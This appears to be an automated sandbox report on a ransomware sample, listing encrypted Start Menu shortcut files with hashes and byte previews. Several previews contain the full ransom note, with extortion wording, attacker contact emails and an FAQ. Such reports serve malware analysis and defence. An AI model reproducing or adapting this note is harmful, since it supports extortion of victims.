                  SHA-256:07F08F148C087F966C865ACA31261AF7B4E7A0873D5A583C72C6B029E9C154B9
                  SHA-512:30829CE11FFCB498A71F232C37636B0BD9166B7D973E616143176D3BEB9E8B096843B97B30063A087166358A80929ED7EF803D5030AD713989AF836D5CBEC043
                  Malicious:false
                  Preview: .O......V.....{...h.y00.I.v..\Sj.d..E.f6b.JY...F.CD.-...@..a....O:.;..uk.|$1.+..4.~..7}..,...G...R..q.a.gS.f@y@.".,..6...T..loN._..5..Y[...V.G..........`........G.U.NJa.;.^.....3....R.&Y..+E...v..p......jT&i.0~eG....UZ.u.q=.r.j...I..O........)./.\M.|M.t>qp[4....p.Gy.XJ.D.q..0W..*m..kw..l!...`..P...Bo...Zy...I..M.}#.Z..Y*..#.<.`4l}..o%.(...C......:.l.....|...mY..K?;a|...S.Z/MC5B...o...Q.B.v.vo.^.{..&..qW.(.s).B#.S....w.=..C......0p.J/#.|.yD|^...IN.=4....r.w+.r+s;..-.R..6.];T....E".JeQ..%.....vO.]S..1..a.p..?.\....4.E.R...v....Y.c.|f.rGg..$..z..T/.}l...Q..,.a.P2..i....u....R..B.)..l.I.....$.~....ZM.m..Rm....ecS...E........nS..jIu..cv\.i>..j.....96.?@..`..v...W.gP..+.G..Y......6V..W\.Z6.N.!..TJ...g.t...!Q..a..s.O.@..e...[.y......$-...N....U...*....0*....`.X.!.....K..g....8z.:U.._.&7&.a..'./..>.<'......$w......{:..8}C..K.....e.....M...,.tM..&m..dqAZ...y.`......S..Tah....%~".%\.....}X..h!7h7.c....SYz..........vE..C..fn....PA..)h..\%K ..]...).
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Compile Script to .exe (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063255328435594
                  Encrypted:false
                  SSDEEP:48:Nq20bqggNLoD5ltkBD2sJZConFTb0FUHX9IW/iSmytiRIyTHwTksgWW+2fnqI2:Nq2jho9ltkBSWZC4TGUHXNamaQrKfqI2
                  MD5:535EAA38915FF5453D1F05C5C81F0C81
                  SHA1:EC21A519E864931A6E6991683462985ACCC407A2
                  SHA-256:3AFA48D0769521DCC5FD6B8AA0F74BFF73BBAAA369739C779C466A38D43B5777
                  SHA-512:76D88355E137D881C6F92F6C07088587F08D6F5A89D8450AD33915C3BC52C38BEBF70273C36BD2E3A5C47261902356F9F8E72AD4967E6E809FF3D51069BBFED2
                  Malicious:false
                  Preview: .....4..REyP...k.H....6g.)Wd.f..=.,|....F....}.k|!...w\.V.V.Ow.\..0a.EVQ...3...`Q..Z:.O.....b.E..,..9.O..*.~.Z.. ?.......;....^.4.kq3xg,.]c......a.N.&..xW..oNV....Az...]-.SL...c.....U... ge..tr(q....uX..6...<.(..s.....g..1.....NBj;\U....8d.*hK..c&#u....i...^........\M....)..S..]...x6.W...`*S.Sa.a...-.$ .a;.h/....zy.1....r.l./`g...u.../....^."..aYS{.3.%.[.,6..2`G.#...4V..$a....8...+$......aS...BTu.....`...*B...?2..../=nG..&.....C...Pf.N.d.;g..z.0|..Y..T....L..X....b. ....4..X&K..m.....X...kA.WUA...s..z.4..r........p..N(.cO.......[..H.5.].....s......kN.....;.V....+s....v).x.gpt...S...Ku.-....'.......b7)..".6.9~.P>F...^j<.3Y..-...0R.apf.CN.1C....._..XXT....]....V/.....l........S.D.|..C0>.jLv....R.Nj.L........\!$...R.......&F...=9.......<tx..?hS....*.U;#..QM.|w.K.7.U...."..i#...j.|..!$.....k..:..VQ9.....{.c..xN.R..U.y.J..A..h.bLK.~[.O...N......;w'....A~.......k....s+ ...)}......................I..*...../..e}..;........A..'.5.[y.J..ld
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Compile Script to .exe (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05328114897745
                  Encrypted:false
                  SSDEEP:48:J3+3vs7DILiE+dezUpUa4htpoxXeKv6eo8MyUFznhyIv7+oAAZFcXlPp:83vsUuE+IUpUa2qFk5pFVuo+Pp
                  MD5:F320AB6154D8F48C5AD2E6DC56878F6C
                  SHA1:BFF53C8873C9A410EBB2E9E51DB1835FE84ED9FC
                  SHA-256:83E2855155E9BDDBCA512DB78704A02B545CDF885514DD8FBD03189E8B604013
                  SHA-512:B36A5A555F0B62239133DF41785E5AA726BD440997997ED4E597D9245E40DD425B03F036B014240D4D02FBD12D241BC490AC759A89ECF919278D8163901A27AE
                  Malicious:false
                  Preview: #.hz...vX..lW.a_`.#.........g.a.#ase..X$....5. ..d...Y.]..C.....BLv........}i +....{.'......h.Dp5...c...<....b..S...4a......`...v.S....,../F..?x..o...YX....H....Zv}A...I..)..9..U.....;X.T.u].1hJ....Z.1......@e.":.b.4..(?v..k.,.z.?&..Awp..N.C..@M,.y.3.:.v..r..G..M.u.5..h.....f..sr8.J.....tR5.;..|c.9 ....-E....%rw.>....UN...^0.wJ/.Wb.x..Q@'c..OjC@...H.iS..9..=....oR.N....E..1.X....a...y....*G.Q&...Z..}...M.......{.[...i...."B...B....w.8WGc..Bu..S4nz ...=.}.T@.WR.....S=...ko..(}i/..7.....L.L.>a...Mb8...++....3g..+.v2.q..og]1....W>.......}.......:f..(q...0.........c..[B.NL{..z.....d.+.G.d..@..&Z:mW$.`...$.....k.`R7..f.b.p<)m....o...9.[..b...91R^....V...r.&..&..&......0$>H.5..\..V.N.O.;F.......6G.......[ ..>-.-eq....&..3\....P..Jd..9.5..\e.q..%...f.&.......Fg7.>..a...7.T.........,k...</<...icB.UD_...#..6@.4U6$..{.WE.e.I...pl..L.j9]=!|..<...HPL.;..c....rp.@.EF.8.x.....r.6,t.._..u....2~...7d/..l!...1i..r?t....?..nW......x#9{i0...3.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Examples.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061065605399158
                  Encrypted:false
                  SSDEEP:48:q7Zu2TZCpkflSzg9As6CGrtUudZhQVmL4ZF7MFj5tftHlcxpfx0WoKxEx7J3:q7DsutSkD6CGriuHaVHZFYFftHYJRlxO
                  MD5:97F7D615C5BAFA2B84CC45778D6BAD88
                  SHA1:530C5BDD3A8E85DE5F178888E1AB986E50F50EC2
                  SHA-256:2F91AFDED0BFE851DB4F1ED6F94106A93AD7530045B7A1F443E370D90363B0FF
                  SHA-512:DEFBD4E28D4B98B60505967F9306857C64961443349C62767624C3E5FD3C7CFD543AAFECE91B0A347FD81183EBC044FA39BC9F38C8B893D2CF5188552674919D
                  Malicious:false
                  Preview: .%.^9g.q!...^.?.d..^FY...K.%U....3..).F....JjU..G.=...v...cb....@..Az./...@....|.A...Z..........f......'...m8=.)....X...\P.'.Ww.!Q]vHY>xz.k.Ga<t..w.{.....`R{.$./"..s....X......zf.C...@..&..E....1.....\..+.....T.dlo...=*.Zn...}....%.......e...G..s..TU[..u.q._3.?.2...Ab..]x9uZZ....Z.jn ....y....eE@..._..d$.U_..=*i....b.2.g... U.A.h.T.......8..l....i.,...%.>.P...R|..J.....9r(...g..F.'.%Q..o\...?c......a..<...X...0m.....z]8..6.;2.,.J.VO.....G.Q3....$..<..~.N{1...~e.e..uZ+....;r..e.m...\gW..y.........u...`I..d.9..a..BI...O....n. fc>mG.A@.>...._T..KR..H....D.1...z......7<..(....n.ww.U..&..]j...@D...aN&...g.+].k...w4....@...D46[..[5m.....Gm..n\1.Oj.../.n....%=KO...|....d1....i.Y.....z....w[.c.`V..,p.30...qu..^n.F.-.:.pTH#..m.Q...A@y.....8b3k..."...}.....iMm.S.W....N.)e.$w4C...&A.e.....>%..T.N.w6$d_pu0..L..-..5....iD.#.0......H.s-..3......X.a..p.W^..J.Y.5A>.3...YW.R.|}L^..-<*;.#.r'....!..Y.....]..v!.3.E.........b........C.C5.X4X+......hT
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoIt v3 Website.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054082498216279
                  Encrypted:false
                  SSDEEP:48:W1ilquIBH50zGAAERikeFk4dv99QHTERLtKcekyqlN3pZJ5ULeoVK9owB/LF/K9T:J5IBZ0aA5RibFTv9W8w0lZHJ5ULdVK92
                  MD5:EB5B46F6E6C51D7E4848D4F0304D9903
                  SHA1:A0D9D202A511D38E7E4175C7BB026938DF001EF7
                  SHA-256:FD536E5562F5C86A8290B1801480E3E966BED94C8CA2B8837D6B6E740F628A4E
                  SHA-512:FB615686920FB29BA87EC4AE23A824468BEC0D06C249CBD5812B6A41E0D8373C649723EBF70DF455460194C2F1540234402457A03190096D1058F34EB78F56DB
                  Malicious:false
                  Preview: .<...[....,d.%.v.....qRi.1k}..-.....Q.z6!...ax5[....gP.`.LX...KJ.$..".M....H61.%x.r.h...[E.....N\u...\.8pE..n....J......yx`........vd."?.^....i<u..0.u+.W.$.9.~.yB.x6..w.Y.Wt....W..-...d.r...:..^eo.vL.r..>qb_Z...q..p]............6....1...J.......6.......Qh.N.P@.b7.M.../...aT.A.....b%...l9Z..4M.2`..dU.H.q=....!p...4..Gsn..Ys..R... .Oc...f....{._m}....xF.._....nM(),..*..'.5.>.WY#.$8...'.E...t.g.j-h<..,.....El`...`....O!.5....M...Q....C,F...s....bM9..]}>......BG-.0.J.z...F]....'o.L.TC...!.......iK ..D.B.>M.E...;.J..:N.V.....8.T.:...j.m.'qk...L.y.S.lp.../..$%..(.....>..3D....@...<P..x....T.=.G..oz.Iw../.../.,L.n. ....&=..R.['$......q.&..p.\...I.c/.7.....B@uY..o.N.-.*.......g..Bk.....cP.3`.+J..c.....V.KI..H64\i..6..q.4.....2..<..[O.F.......t..A...^b...3=.r`..\.....VG....%..f..3..N.:.;q.@.&...`..=......k.nG9...f..]......jTT.....It..P$.K..3...9E;...._8......+nr..'.5G.w..Z.j.Y. f..49..yt.i...AM..A...h-....o.O|`.o g.....K...<z.j.X*...\.).
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\AutoItX Help File.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053155168343968
                  Encrypted:false
                  SSDEEP:48:pLf11pfHUfJKR2yYN/c85K3QZ1aYVbVcjyCRAuvZKBWH28elvhH+iXgbBcEsiKOI:5fRMsDm/coKAZ1acbVcjyC5vsSRel5HT
                  MD5:DBD8F4AD68295F90456DAD6B6EEDEB27
                  SHA1:F6CD00F2ED3BC13248457558284726141B115013
                  SHA-256:75304855469F8CDE7F0E69881A328BF038E501932C64E207DD7089FA6E6082FD
                  SHA-512:38847CBD9C04A2E0C9240141AD0B2007B932CCE439840FEF44E02C57C02BA31556FEFC06F33B52F1AD05D7C40423A867B220C95D6035A6770EAA3127F133ACCE
                  Malicious:false
                  Preview: ....a *....Y.D=.......L.<.Qy.~9>{.w./......C.... 5b.. ..U.j.{._.....{c|.....y...M...<..a.D1..&.=..;..z..A.....G,,M..G..qQu.F...#-..uT....}.0.jp.y..!.i .?.7X.H vc.rk........`.......!. A#R....-9T..r^...*...\\.U.....h]....7+dY.....y......(.../.K.[e.q.4.W..0.nk...swf...T.....Sv...*.8..............0.c..h.-.......c....yk....".^.v%.]I.W..g.....u.B.a.....X[Y.........o.u..a..7%^K.n....F..L.'...L..v..p...E...[.Y........l6....U.9:A.7jT..I..D$..e....|0....9f.}.0....t.........B...gt...A..a.;..2..n@..7.S........C".!...;...p.T..)Z......D.."M...k.G.....Q.a.:.oE.".>.r.._W...kVL..v.....oa{.N........^...`JL.q.H........+|....l._..AFs....7..z..93...?.......K5..2#@S`...*D.Rn....?.....4.......C=4d.CS.........9......S,d..."........KK"\.`.u.....bJv....|....N..cb|.k..i"e....^......dz.a.wrwmK&f...J......b....vJ....1..;n....[x7...G..&<o..(.*..y..L.$1,d...!f..y.u.s.%..;.m..1...y..I,0..5....c..I...'M..0q...i`D..<..C`.\.qA.....1..&>o..U.F.#T......
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\VBScript Examples.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.052931979440348
                  Encrypted:false
                  SSDEEP:48:4dJ1v0Hx8T2Akjq9BRez+TCU13JWa0Sa4iv2TKgLcJ3YHqGYidLt9QEJiftA1bXw:4X1cHiTbZBksCsva4zTy3iLt9Qiifm1s
                  MD5:C1A006CEA9A00584C853841D3A624900
                  SHA1:24EA7E7F1C3B7AD295B629CAC1E57C8916C224C9
                  SHA-256:ADF257BDE097C42D7E52FD5E816F6F4C4CA197525CC6F95BD94B4903FAB4DCC1
                  SHA-512:0F11B47AD7357292217A83CF0EA7D830C2AD31C66D5D6360623C256AD5E3C5810603C7E49DACE18F4246D944918A558D3E7422795B5F05A3F09FAB36F80F1FDD
                  Malicious:false
                  Preview: s...}....I.m...=...:...YT.*EV..^..<r...tA.d..@...z...z...`>.q$.)./...-U..'.$S....s....a.U.S....IV.}....K<......Z!...6...7...)....;......8@-R.-....L......A.+...h7i...g97...u{`....>.abW.........f...9.F1(...$.Qi.QB>.../2.{.cV.7...Z....Rd..\}.....3+ .B...wGh1...i...V..#.Jp.....6..A...l..../L>)._.j.e7s;.l,....R....m.}.......'A.....R......B.0.R.m...@.....;b...F.....9..d.......<.H...Os_...5...(.8...P\.......&w....B{..[..w.n.3.<......+.....|P..$.o....0.S;i.......9..%.r........S.r._..8....D..\..8...B/.....'S.xD.|....H...e.C....xY...'p...%CH.....[.C`...2<.^........8].9>......$:uX.wqW`z.d.Y..V..%...h.|.].v...Q....04....V......;.5.(..dHM.nb..("}O..hG..$..(R.:.......F.d.I...."..).T.3.?.MBDDe.A...,..ZZapLB8w.-j.Z6......M..?Y6s....F......"..... ...K^...*..k[..?.....z....:..Xv...Z.mQh..n....o....[.Y.Ki{.VK.......[d.V....s...Z.......'.Q.d..._"..t.M.........<Y"(.i..:.'...^HY..]....~..7./_,..p..$.S..OoXmTrT...2...+.ED..55@..Ax.]......X.,(.Y...n.8i...
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\Browse Extras.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.031623879955938
                  Encrypted:false
                  SSDEEP:48:mrARG3ciUePR/8OPuov2QUQ0nI0UA6EtZ/6TwZAoZQaJM1KkM0BI4:mt3meZ/dPKJpnIHtYkInyy70BI4
                  MD5:0AA0F02D6C75D70649C0D109FF088C1F
                  SHA1:90621270ED9880766893B2C8D85D67BC5C146E1B
                  SHA-256:F9B2163316B221270A9912C4A3F4F57CA81ED70FCD69F8451E6A134001424520
                  SHA-512:60527EE142C374E955AF1701C0C7A8349301730742D6D41BAC506D0AC31AB2DC5FA82EBD0577F5756CB2CA5A91A9D818BA46BCC19D4A1D6CE4F52CC6EFB7895F
                  Malicious:false
                  Preview: ....B.HQ..".....,$...R.D..y.!....V.U$.pM....!.7...ov.E..8..*..5D|.<W.C.nr...\RP..{<U..9.@P.#...v.!.x....^...H..V.Lg...z~l81Cv.......+..J9..X...Y...o-ef.l9.t5.Yr.iFM..D..X..K.v=A.h.}..YA..B.q...(.r...~>..wb..|..v..Z_.<.@_..1ej..@J.`m4......;0.k.+.Ns....#.id.h.c....s$...B....G...8.t0yj...V..Dw.5{.uE...{<...sIi.E........].....!......W....].........5eEx.1.5l......<..n..O.!G..X.h..K..a...(..A.w.W.....n-:si1.t....c6.A.4.X......a.P(_cqY)...S..i..S..0SG.".M[K}1.U.}.......RU.<...R......./....GB.9U...oW.}0w.L.L.~Q1EC...U..YU........4.QC.....R.......0m........@M.c..b.Q.Q.`.A..?.fq.&.f.:...^yly^.......B..Q..".m..z..sG....rA`..u.ePN2G3..n.?......E....A.).:.....mQ.A..n.4......j....a.om.vp0y....b..C.%.+.(Q.\.l..h....6...C.R..@..u.....M..5...L.......P.f......5..H..<#., ...P..!....!.4..Y........<.#/.A.7..F....%..+.i.....v....Nl$.[....6$.q.%N....T...k.{9......./.G.(.g.B:.?..R.....M...s&.~..vR..n.......c.f....&c........z.8.|. 6~F..C..J....._6...m....a..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Run Script (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0471133740656855
                  Encrypted:false
                  SSDEEP:48:jTLt4f1/DQC8qZKL9IHv6uLj/vvTXzbxYb0wDL+iyL2frPhTliW6:jO1/MqZKL9Qd346GfrJTz6
                  MD5:F47A88ECD481C54263E0EC5913AE1BF4
                  SHA1:B795E6981B6A6DB3C62B21701107F890BA921D25
                  SHA-256:4984041E2A1D7B049820FDCA798E7A8F54272EF0A8081E37D1F93D1ACAD1300B
                  SHA-512:D1EA30C4325B3A4A2887BA277002D0BF1130EB0944C1E70FBC9DC48AADF2831BE98D8CBA31607698F60601DC2E6E0FFC742BBC4B28E2410372F9DCC017E53DDB
                  Malicious:false
                  Preview: ..g~.....Q..jX[...{;w...IO1..(..5...#.B%~H..#E....:.......`]P8gusA(.....Z.1.w.0.....ze...+....1... }.u/r.%w!}\p7R~o!l..Z..C.[.w(@.y...:..O../.:.....,<.V-..A,43].t.U..W%.b).\UH..z..U..t.-..iGg.v8.zC. .......`\......]..A..>.[..c.R..Rqy...2..<.0]....Wo.B....He.[&..../...~3oR...&...x..0......~bT.bw...7VI..n.b...@..N.F.....=..bU#....BG...~..{G.t.h..9i)@..........XV.|7O4.l.+/...J........W..@...G.[..9...j"c'38{.q..n.$Z&.Mx?f6...^'......3..D......@x.1i.p._.......].o7."c.[J....S.<..A.6.....7..#...-....d.Y.....F..$..q[...\..a..^L6zWh...^.S02f..lk.....o.<._.B..N.|^..U.Z.>p)_$.#.3....Th....%:..T2).l3...@.{.{.,.%.`..M_...I.A.&....Vyl..z....Q..r..q.U....A...[....&.f= ..2.r*.Zt.j...*.x.eWo..F.(.}..8.X...y.%.}R.F..M.i..N.p....3E.."./.m}YAd..RL..............nH..........R.<c.e.p.$.G......*..M.`.=................k...<j.Y.Jkk.c..(X..4=.3.S.8...n.R.t..5....}.R IN...u+7.p.-...@..6bW?..IN..$..5......Qi.4.@.=K..k..qP@l.Q..,....4._...........Qu5a.....H.I
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Run Script (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.051480125225609
                  Encrypted:false
                  SSDEEP:48:oUrL4zkzxUmiS60m7YgyrbsE7tDLNLGKfw4TQal/06CPHPrEab:oELbu0Pm7Y/99LFwEhTLab
                  MD5:AD97BF02C55A6483B33E99E7B698B9FF
                  SHA1:5F4BD9B1A87FD91540886726470342B66E175AE1
                  SHA-256:6B27485E87611AF1C6DAC334A26964A9A25620523B5C375B0F3FB2B63F9D22E4
                  SHA-512:9B5087DD3F4F51D209BA7F9B9AB315254157DD9218D3BE14E101609170542B7C60E55750B8E3DC619CA866A5D9E0535C33B2BFC40F16DF40F80733B5C2C44481
                  Malicious:false
                  Preview: ........^'d../........E.N.V|.V.E..y..l...s}....+6A.o...A....7..s..Q..`H..R.)W........em.!...&Th...r.%PG..[.U..R.$....c.!.:_......?..u.gE..OfN.....5...Q4V.....4....UI.FQ..9>e.>..I...x4n.'.....Y.bq.s..M.~.XJwK.q@.h..\.,..Z..r..p.....j.q.7....|..)..........?..Z..*...T....a..~.....*.9q.A. .Ew\F(...{..l.4..*I.e._.h....k !..,.)..%5>..u.Y1.....R.-.].?.B...,.pz..FYQ^t..JzuY@..]<..o.|....R...8.......\.&..4..M/..6z.Y..F...EL~.1)..x..&.Q..X...%.xqvQK&.h..u9.._...}..........Hv..o,.....{.g..<....v..z.....U...d.R.TA...!.......G.i}F.M!6...H..&.v..eoI....e.(.8...a.E.}.....)5....pBE.K.<.....y.u$D...=......@............hk.:kD.r..d.u.k.;>_..*..:Vx..Ax,..@...U./{.....W.W.{....Tt.%..k..3.k.K. .. ...Nh........s...A.I...%.....=q.i.V.k.^...T..b.7./5..=0..l..^=6u V.>..j[.|T....{.S-."m..W..}."..5c......m.54;.Cq....Z.w.l.Ku1e.mAiu._...cg.=.U..t....^....6V9\.....*.d?...i......--..K..L^.2...Q......,p_=....d.=5d.Z$......k;.0..]8..R.I\..9...j7Q.e=...Dw....r.#....
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\SciTE Script Editor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061378014652832
                  Encrypted:false
                  SSDEEP:48:lVF2okUBpTf8H/VnTSiZcStKxL1tqzZqO2O/5kIwRUbWItpqQS8YekW:lV/R1f8NTSGcdL/qND2O/qIUIt/z
                  MD5:6F7A06AE2130F2CAF01D9ED37191973A
                  SHA1:CF5841B0F7804F3C2C21EB0BB4FAB56BDC26C6D6
                  SHA-256:562A54AE3696F1B2A325AD4A7C0732046631A15E33139BAEFE8C48022ABB323F
                  SHA-512:99F445200CDD0F7A58AC780B687D33B4288AC1752C31EB9817734EE8BC3D21A45E8F88EB9B907A146D9ED2423E7B42C4828F0C520B2607EF88F27159C96A91C6
                  Malicious:false
                  Preview: .d=.6....f.1P..{bh\/@.c..x.w.).:..v.f...x.4...8...g..x.|kV....n..|...e..../r.......J{?}.t.}...As..^.K..oZz<.7S.N...9.....7..pb...1.U8wLS....t....?Y....%.U..z..5...2...d`.../Nq.U..Z'...s8*.7.GONd."..v.S..Z),.Y.#..p...D..{WF......m..3..E..PP..59_..V...5...K^.=H``. <X.w.B'...i...m.v0.%aC_P...4.%].U.=.x......V.H..&.......Bcu..!.gSl=.c.ew. ...~.V...E&7z.(...:...]=...D......z.*.t...EhG.,.N....d.d#.<J......Z'5..Y..I<.S.#.O..j.gr}......Z..~...`kV..+Z...2x-w<.&I.....o....\.N;D-......?E..}...9$..!A.v.?.q..!..e..Lj....0N_"....M......}....!....n..3[W...0U.{1..9.. +.ea.Gvqa.>.T.-..{..U..(~U..g.%....o.z...*.VPsI..M.9..{U(..9.j.{.6.x....U;1(.V[|.6....LE.7..c....H".+UR.w.{.1e...n.....M3M.....m.........p.s..3..6...M.Z.hz#.^n6......{g...e.."......Pm...r#.....!.Vq=y:..."...qZ.O...,.1H...g.gO.....o.F..Ai...e$u....%...6PP...xx.#%..Q..W........f'......,.$..A..G..b."]:.p.......D..'.c...._.M.u.E..Q./...s0...........@.....NaY........=.5=.)y<I.t.....{.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.77673582188244
                  Encrypted:false
                  SSDEEP:96:vHTnoxFsrGbMFW2rWdhe3rK+H9plOi9gNSb+6hw0KpMj1psonBik:vHjoUrnFWze3r19pkWYSb+6hHKo1Oond
                  MD5:AD5C1B3EDDD9222F7D66A16D4E636162
                  SHA1:9FBBFE8FDDE5B4DC470554582E87D9B1AADF95C9
                  SHA-256:91D312ADFE833F65BC58185A27B3AD5A729071D35CB817121999BE98A95C8904
                  SHA-512:9F8C1B71342D4DB0EC8D7C70DD0D3F7D28544AAC4E36CA3A827C1E4F4835F400A18A8A2BDD8C5D919537801D912AC0D1F90726476F952FA5D1D450F3A8A1251A
                  Malicious:false
